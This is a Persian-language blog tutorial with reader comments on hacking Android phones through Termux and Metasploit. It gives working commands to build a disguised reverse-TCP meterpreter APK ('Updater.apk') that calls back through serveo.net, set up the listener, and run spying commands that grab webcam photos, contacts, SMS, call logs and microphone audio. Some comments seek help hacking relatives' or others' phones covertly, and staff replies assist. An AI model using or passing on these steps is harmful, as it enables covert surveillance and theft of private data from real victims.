آموزش هک گوشی با ترموکس ۲ روش متفاوت – همراه با ویدیو آموزشی


آموزش هک گوشی با ترموکس – termux
فهرست موضوعات مطالب
سلام خدمت کاربران مجله آی تی همه این سوال واسه تون پیش میاد یا از خود من میپرسین چجوری گوشی یک نفر بدون اینکه بهشون فایل مخرب بدیم هک کنیم. ما در این آموزش میخوام به شما آموزش هک گوشی با ترموکس ( termux ) را بدهیم تا اخر این آموزش با ماه همراه باشید.
آموزش نصب متااسپلویت در ترموکس
مطالب مرتبط
آموزش هک گوشی با ترموکس – termux
خوب دوستان میریم برای آموزش. اکسپلویت این آسیب پذیری برروی متااسپلویت ( metasploit ) وجود داره و ما خیلی راحت میتونیم از این اکسپلویت استفاده کنیم ، پس من در قدم اول دستور msfconsole رو میزنم تا متااسپلویت برای من اجرا بشه
بعد از اجرای metasploit با دستور search اکسپلویت مورد نظرمو سرچ میکنم
بعد از اجرای دستور بالا که دستور سرچ بود حالا دستور use اکسپلویت رو انتخاب میکنم
بعد از انتخاب کردن اکسپلویت ( Exploit ) با دستور show options تنظیمات مربوط به این اکسپلویت رو میبینیم
موارد مهم را به ترتیب تنظیم می کنیم ، اولین مورد RHOSTS است ، یعنی IP گوشی قربانی است که می توانید IP گوشی را به راحتی دریافت کنید (یک ابزار گرافیکی به نام Fing Network Tools برای موبایل وجود دارد که به راحتی می توانید IP های کسانی که هستند را مشاهده کنید.
بعد از تنظیم کردن ip تارگت دستور show action رو بزنید تا لیست کارهایی که ما میتونیم روی گوشی قربانی انجام بدیم رو بهمون بده
خب بعد از دیدن لیست کار هایی که ما میتونیم روی گوشی قربانی انجام بدیم کافیه که با دستور set action و بعد از دستوری که میخواهید روی گوشی اجرا بشه اینکار رو انجام بدید
بعد از تنظیم کردن دستور بالا کافیه که run رو بزنید و منتظر باشید تا نتیجه رو به شما برگردونه.
خب میبینید که دستور اجرا شد و داره name رو به ما من نشون میده حالا من دستور رو عوض میکنم و میخام که لیست فایل های صوتی رو ببینم
و تمام روش اول تموم شد موفق و پیروز باشید.
روش دوم آموزش هک گوشی با ترموکس
پیش نیاز های هک گوشی با ترموکس
- نرم افزار Android TermuX (دانلود از فروشگاه Play)
- فریم ورک Metasploit نصب شده در TermuX (آموزش در اینجا)
- اینترنت فعال / اتصال WiFi
- TermuX باید اجازه استفاده از Storage External را داشته باشد (برای این منظور فقط یکبار این فرمان را وارد کنید: “termux-setup-storage”)
- MiXplorer (برای امضای فایل APK، آن را از وب سایت UpToDown دانلود کنید)
- Apk Signer) MiX Signer برای MiXplorer، دانلود آن از فروشگاه Play)
- از صفحه کلید هکر در خط فرمان TermuX استفاده کنید.
Port Forwarding
بسیاری از افراد از NGROK برای درگاه Port Forwarding استفاده می کنند. اما در NGROK ، می توانید هنگام اتصال مجدد به دامنه یا پورت جدید ، ایجاد کنید. دامنه و پورت اختصاصی فقط برای کاربران خاص است. به همین دلیل ، هر زمان که شروع به هک کنید ، باید یک فایل APK جدید برای NGROK ایجاد کنید.
در این آموزش ما از Serveo استفاده می کنیم. در Serveo ، می توانید دستی خود را در اینترنت بارگذاری کنید. برای استفاده از پورت Forveo forwarding ، باید بسته OpenSSH را روی TermuX نصب کنید. برای انجام این کار ، دستور زیر را در TermuX وارد کنید:
pkg install openssh
پس از نصب، این دستور را تایپ کنید:
ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
در اینجا چند نکته وجود دارد که باید بخاطر بسپارید. اگر می خواهید پورت HTTP را فوروارد کنید ، پورت های مختلف را در هر دو بخش “Desired_Port” انتخاب کنید. اما در اینجا می خواهیم پورت TCP را جابجا کنیم. برای فرستنده پورت TCP ، باید همان پورت ها را در پورت Desired_Ports وارد کنید. همچنین “localhost” را تغییر ندهید. در اینجا ما می خواهیم یک پورت TCP را به جلو هدایت کنیم (برای مثال ۴۵۶۴). بعد از پورت جلو ، ممکن است اینگونه باشد:
ساخت فایل apk به همراه پیلود جاسازی شده
برای ایجاد فایل APK با Embedload Payload، این دستور را در ترموکس وارد میکنیم:
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/Updater.apk
بعد از چند ثانیه منتظر ماندن:
همینجور که میبینید میکنید فایل APK با پیلود جاسازی شده با موفقیت برای ما ساخته شد. Phone/SD-Card Storage -> downloads -> Updater.apk
همچنین شما می توانید با استفاده از برنامه APK Editor Pro نام (Default: MainActivity) و نسخه فایل APK تولید شده را تغییر دهید.
امضای فایل جدید APK ایجاد شده
ابتدا مدیر فایل MiXplorer را باز کنید و به فایل (APK Un-Signed (Updater.apk بروید.(در پوشه ی آپلود قرار می گیرد).
APK Un-Signed (Updater.apk) را کلیک کنید و دکمه MENU را در گوشه سمت راست بالای MiXplorer انتخاب کنید ، سپس “SUBSCRIBE” را انتخاب کنید.
این گزینه امضای فایل APK را به ما نشان می دهد. برای امضای خودکار و موفقیت آمیز فایل APK ، AUTO را انتخاب کنید.
در حال حاضر، فایل APK شما با نام filename)-signed.apk) با موفقیت امضا شده است و حجم ان نیز ۹٫۹KB میباشد.
راه اندازی Metasploit در TermuX
با وارد کردن دستور زیر در پنجره جدید ترموکس، چارچوب Metasploit را در TermuX فعال کنید:
msfconsole
برای نصب متاسپلویت به اول مقاله برین و نصب کنید
اگر این خطا را دریافت کردید: “Failed to connect to the database”، همانطور که در تصویر زیر نشان داده شد، دستورات زیر را در NEW SESSION وارد کنید.
mkdir -p $PREFIX/var/lib/postgresql initdb $PREFIX/var/lib/postgresql pg_ctl -D $PREFIX/var/lib/postgresql start
بعد از چند ثانیه منتظر ماندن:
بعد از اینکه ابزار msfconsole شروع به کار می کند، دستورات زیر را با دقت وارد کنید:
msf> use exploit/multi/handler msf> set payload android/meterpreter/reverse_tcp msf> set LHOST localhost msf> set LPORT 4564 msf> exploit -j -z
نصب APK در گوشی Android تارگت
شما باید فایل Payload-Signed.apk را به دستگاه اندرویدی قربانی خود (مثلاً از طریق بلوتوث) -> نصب -> سپس باز کنید (مطمئن شوید دستگاه قربانی از اتصال اینترنتی فعال برخوردار است).
پس از باز کردن پرونده APK در تلفن قربانی ، فعال شدن جلسه Meterpreter را در بخش Metasploit خود مشاهده خواهید کرد. برای باز کردن یک جلسه Meterpreter از دستگاه قربانی خود ، روی دکمه برگشت کلیک کنید و این دستور را در جلسه Metasploit خود وارد کنید:
(sessions -i (Session ID
در (شناسه جلسه)، شماره جلسه Meterpreter را انتخاب کنید (به عنوان مثال هنگامی که قربانی شما فایل APK را باز می کند، این پیام را میبینید: Meterpreter Session Opened 1، در اینجا، ۱، شناسه جلسه Meterpreter است).
شما با موفقیت از Android دستگاه قربانی خود دسترسی گرفتید.
در محیط متااسپلویت نیاز به راهنمایی دارید:
می توانید فرمان {meterpreter> help} را برای مشاهده تمام دستورات در دسترس وارد کنید.
از جمله دستورات مهم:
گرفتن تصویر از دوربین ها webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg دریافت همه مخاطبین dump_contacts -o storage/downloads/X-Contacts.txt دریافت همه پیام ها dump_sms -o storage/downloads/X-SMS.txt دریافت تماس های ورودی dump_calllog -o storage/downloads/X-CallLog.txt جاسوسی از طریق میکروفون record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3
سلام من وقتی ای پی فرد قربانی رو وارد میکنم و وقتی که دستور مورد نظر خودم برای مثال دریافت اطلاعات گوشی رو اجرا میکنم ، داخل بخش متصل شدن به ای پی اررور میده
این ارور رو میده برای من چیکارش کنم
Command as in package binutils
Command ls in package coreutils
Command gs in package ghostscript
Command ts in package moreutils
Command ps in package procps
Command ts in package task-spooler
سلام
این چطور هکی هست؟
یعنی بااین کارهایی که گفتید وقتی اون فرد برنامه رو ریخت چی می شه؟
من گوشی برادرم دزدیده شده آیا میشه با گوشی خاموش لوکیشنش رو پیدا کرد؟
صلم با ترموکس کد های دستوری رو از گوگل پیدا کردم و زدم تونستم لینک هک دوربین گوشی بگیرم اما رو گوشی طرف مقابل ارسال کردم و اون قبول کرد چیزی برام منتشر نشد و هک واتساپ. کد که باید بزنیم برا واتساپ کد میاد. کدی که از ترموکس گرفتم را میزنم اما اشتباه و هک گوشی که اصلا نمیش
eror مید برا دانلود فایل های دستوری و … که نمیش گف ?
سلام خسته نباشید من برنامه رو فرستادم برای اون طرف اونم نصبش کرد رفت داخلش ولی وقتی دستور sessions میزنم مینویسه no active session
من الان هک شدم ولی حواسم بود ی ۳ دقیقه دستم رو دوربین گذاشتم بعد سایتو بستم لینکو بستم تا کی این عکس میگریه دائمیه یه موقت
موقت
سلام
ببخشید قسمت سرچ
حتما باید es_file_explorer باشه چه معنی داره؟؟
ممنون میشم جواب بدین
سلام چرا فیلم آموزشی ارورو میده
سلام چه اروری میده؟
سلام چرا فیلم آموزشی ارور میده؟!
سلام من وقتی میخوام متاپولیست رو نصب کنم ارور میده چکار کنم
سلام چه اروری میده؟
سلام میخاستم بدونم چجوری ب حالت اول تو ترموکس برگردم
همون حالتی ک موقعی ک تازه نصب شده میاد
سلام چطور بفهمم هک شدم یا نه و چطوری از هک بیام بیرون؟ خواهش میکنم جواب بدید
سلام
من متاسپلویت رو کامل نصب کردم و هیچ اروری هم نداد ولی برام نمیاره اون صفحه رو میشه راهنمایی کنید
سلام خسته نباشید
واسه ip گوشی ک برنامه فقد مال وای فایو نشون میده.بجاش میشه از همون لینکی ک واس هک وب کم استفاده میشه استفاده کرد؟چون اونم ip میده طبق چیزی ک گفتید…ممنون میشم جواب بدید…
سلام خسته نباشید
واسه ip گوشی ک برنامه فقد مال وای فایو نشون میده.بجاش میشه از همون لینکی ک واس هک وب کم استفاده میشه استفاده کرد؟چون اونم ip میده طبق چیزی ک گفتید…ممنون میشم جواب بدید
سلام
آیا بدون داشتن IP هدف و صرفا با داشتن شماره موبایل، امکان دسترسی به گوشی وی امکان پذیر هست یا خیر؟
با تشکر
سلام من اپ ترموکس رو نصب کردم و طبق گفته یه سایت دیگه برای اینکه بتونم آی پی شخصی ک توی تلگرام پی ام داده رو پیدا کنم باید باهاش چت کنم و دستورات
apt update
apt upgrade
netstat_n
رو وارد کنم و یه سری آی پی میاد ک آیپی اون شخصی ک میخوام هم جزوشونه
ولی من در کل اصلا هیچ آی پی ندیدم نمیدونم من اشتباه راه رو رفتم یا نه
روشهای سایت شما هم خیلی پیچیده بود و من درست متوجه نشدم میخواستم بدونم روش ساده تری نیس برای پیدا کردن آی پی توی همون اپ ترموکس؟؟
ممنون میشم اگه کمکم کنین چون اون شخص خیلی مزاحمت ایجاد کرده من فقط میخوام از طریق آی پی بدونم ک این شخص مال کجاست
سلام دوستان میخواستم بپرسم میشه با ترموکس از فیلتری روبیک در بیایم هرکس بلده بگه
ssh -R 2121:localhost:2121 serveo.net
بااین خطا چه کنم
سلام داداش من روش اول رو میزنم ولی در برقرای ارتباط اعرور میده. چه باید بکنم.
سلام داداش من روش اول رو میزنم تویه برقراریه ارتیاط ارور میده.
چی کار باید یکنم دقیقا. ممنون میشم راهنمایی کنی.
درود به ادمین
بنده تا مرحله نصب میرم یعنی اون دستور اتومات رو میزنم وبعداز اون بهم میگه مراحل نصب با موفقیت انجام شد برای نصب msfxonsole،رو واردکنید وقتی وارد میکنم برنامه برام بازنمیشه یعنی همین عکس قلب برام بالانمیاد
باید برای هک از طریق آی پی وی پی ان روشن باشه ؟
تو قسمت port forwarding اینی گذاشتین میزنم connection refused میاد میشه کامل بگبن باید این قسمت چیکار کنم
سلام
من آیدی پیج خودمو میدم شما پسوردش را پیدا کن
بعد من همه جوره در خدمتم
لطفا اگر امکان داره یه شماره تمای برام بفرستید باشما تماس بگیرم
سلام. ممنونم از آموزشتون. واسه روش اول فقط دستگاه هدف باید es file explorer روش نصب باشه وگرنه نمیشه درسته؟
سلام ربطی نداره چی روی گوشیش نصب باشه
سلام اگر ای پی کسیو داشته باشیم ولی به وای فای ما متصل نباشه میشه با روش اول هکش کرد یا خیر؟
سلام روش هارو تست کنید
سلام دقیقا منم همین مشکلو دارم eror connectingمدیه تو بخش اولش وقتی ران میکنم
سلام
ببخشید متااسپلویت رو نصبش کردم و اوکی شد.
وقتی میخوام اجراش کنم و اون دستوری ک گفتین رو وارد میکنم این(CANNOT LINK EXECUTABLE “ruby”: library “/data/data/com.termux/files/usr/lib/ruby/2.7.0/aarch64-linux-android/bigdecimal.so” not found )رو میاره و اون صفحه ای ک داخل عکس هست رو نمیاره.
مشکل کجاست؟
سلام.داداش عکسای بخش اول اینقدر کوچیکه ک اصلا دیده نمیشه چی نوشتی.اگه میشه عکسای بخش اول رو بزرگ برا ایمیلم بفرس. ممنون
سلام دوست عزیز عکس هارو میتونید دانلود کنید و یا باکلیکروی آون ها میتونید نگاه کنید
سلام اقای گل من یه سوال فنی از شما دوست عزیز داشتم که وقتی رات سیو شد چجوری اطلاعات طرف برامون ارسال میشه یعنی داخل ترموکس میاد
نباید توکن رباتی جیزی بزنیم تا اطلاعات تو ربات برامون بیاد
با تشکر
لطفا جواب بدید
سلام قابلیتی نداره که تو ربات تلگرام بفرسته تو صفحه اصلی میزنه چه چیزای برداشته و میزنی سیو میشه تو فایل های شخصی
سلام خسته نباشید
در روش اول بعد از زدنset action همراه کار مورد نظرم دوباره همون جمله میاد
و مرحله بعدش کهrun رو بزنم نمیاد
ممنون میشم راهنمایی کنید
سلام من بعد از اینکه دستور run رو اجرا کردم اسم رو نمایش نمیده و خطای Error Connecting رو نمایش میده
لطفا و خواهشا یا آموزش بروز کنید یا روش حلش رو یاد بدید این خیلی کاربردی تر از اینه که بدون دسترسی به گوشی طرف بتونی هکش کنی لطفا پاسخ بدید ممنون.
تو قسمت port forwarding اینی گذاشتین میزنم connection refused میاد میشه کامل بگبن باید این قسمت چیکار کنم
لطفا اموزش روش اول رو از منبع معتبر خارجی که میشناسین معرفی کنین
سلام بعد از دستور run این متن رو مینویسه
– Error Connecting
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary
لطفا کمک کنید
این آموزش دوتا روش دارد لطفا روش دوم رو تست کنید
بعد دستور runارور میده لطفا کمک
این آموزش دوتا روش دارد لطفا روش دوم رو تست کنید
دقیقا همین خطا رو میده لطفا راهنمایی کنید
سلام خسته نباشید اگه برنامه رو نصب کنیم بعد از گوشی طرف پاکش کنیم بازم فعال میمونه ممنون میشم جواب بدین چون نمیخوام بفهمه ممنون میشم جواب بدین
سلام نه فعال نمیمونه
وقتی پاک کنید دیگه دسترسی ندارین و غیرفعال میشه
بخشید با این برنامه ای که معرفی کردید فقط میشه ip کسایی که به اینترنت وای فای ما وصل هستن گرفت
الان من مثلا ip گوشی دوستم که اصلا یک بار هم به اینترنت من وصل نشد چطوری بگیرم؟
سلام خدمت شما حتما در آموزش داده می شود این مورد
سلام
ببخشید قسمت سرچ
حتما باید es_file_explorer باشه چه معنی داره
ممنون میشم جواب بدی
سلام خدمت شما من بعد از اینکه دستور run رو اجرا کردم اسم رو نمایش نمیده و خطای Error Connecting رو نمایش میده
سلام دوستان این حرکتی که آقای جعفری انجام داده کاملا واقعی و تایید شدس
برای اینکه کارتون خوب پیش بره از روی عکس ها تقلید کنید که جواب مورد نظر رو بدست بیارید
خیلی ممنون از نظر عالیه شما
چطور رات ساخته شده رو پیدا وارسال کنیم
سلام خسته نباشید آموزشتون کامل دقیق و عالی بود فقط یه نکته اینکه برای هر دفعه باید صبر کنیم تا فرد روی اپلیکیشن کلیک کنه تا بتونیم تو ترموکس کار رو شروع کنیم یا روش دیگه ای هم هست ؟
سلام خیلی ممنون
نه یبار وارد بشه فعال میشه
سلام داداش جان من ترمکسم یه صفحه نوشته قرمز اومده تاکیید کرده اپدیت کنم دوتا سایتم معرفی کرده برای اپدیت کردن ،برنامشو از همون سایته که معرفی کردم دان کردم نصب نمیشه،
بعدازتوخوده ترومکس هم اپدیت اپگریت هم زدم اپدیت رو میگه انجام شد اپگریت رو میگه انجام نشد
چیکارکنم دیگه راهنمایی کنید ممنون میشم ازلطفت
یا ایمیل بزنی برام
سلام و خسته نباشید
میخواستم بدونم میتونیم از مثلا لیست فایل های صوتی چیزی رو دانلود کنیم و گوش کنیم اگه میشه با چه کدی؟
سلام من میخام فقط واتساپ یه نفروهک کنم چیکاربایدانجام بدم لطفاکمکم کنید
سلام.خسته نباشید.من همه دستورالعمل ها رو اجرا کردم و کد رو به من داد برای هک واتس آپ.الان بعد از بدست آوردن کد باید چکار کنیم.ببخشید من آخرش رو متوجه نمیشم.الان من کد رو دارم باید چکار کنم.ممنون اگر پاسخ بدین.
کد واتساپ برای من میاد میزنم میگه اشتباس ، باید چکار کنم؟
خوب کد رو اخر به اول بزنید
عالی عالی خیلی کاربردیو خفن
ممنون از نظر عالی شما
سلام چطور بفهمم هک شدم یا نه و چطوری از هک بیام بیرون؟ خواهش میکنم جواب بدید
سلام در این مقاله به شما گفتیم که چگونه بفهمیم گوشی هک شده است
چطور استفاده کردی به منم بگو
سلام اگه انجام دادید میشه لطفن کامل ار توضیح بدید
سلام خوبی شما این کارو انجام دادید.میتونی راهنماییم کنید.ممنون
لطفا تصاویر رو از حالت بند انگشتی دربیارید
سلام ببخشید بعد وقتی تموم شد چطوری ازش استفاده کنیم؟بر روی گوشی دیگری انداختیم نصبش کنیم تمومه؟
سلام بله
تمام مراحل را به شما گفتیم
اقا من ویدیوتونو توی اپارات دیدم ولی کداشو اینجا پیدا نکردم میشه کداشم بزارید یا برام ایمیل کنید ممنون میشم؟
سلام کد هارو به صورت عکس گذاشتیم
بعد دادن آیپی ارور میده ونمیشه کاریش کرد
چطور رات ساخته شده رو پیدا وارسال کنیم
سلام داخل فایل های شخصی سیو میشه
bash: syntax error near unexpected token `(‘ چرا واسه من همچین اروری میده تو دستور دومی تو آموزش دومی؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
کجا فیلمشو پیدا کنم؟
دستور show action ارور میده
سلام خب الان چطور از این فایل ها استفاده کنیم نشون داد قبول چطور استفاده شه؟
این نرم ترموکس ینفر روی گوشیم نصب کرده حالا چجوری ازبین ببرمش خدا بگم شماهارو چکار کنه با این اموزش هاتون
روش نگه دار دیلیت بزن حذفش کنه ?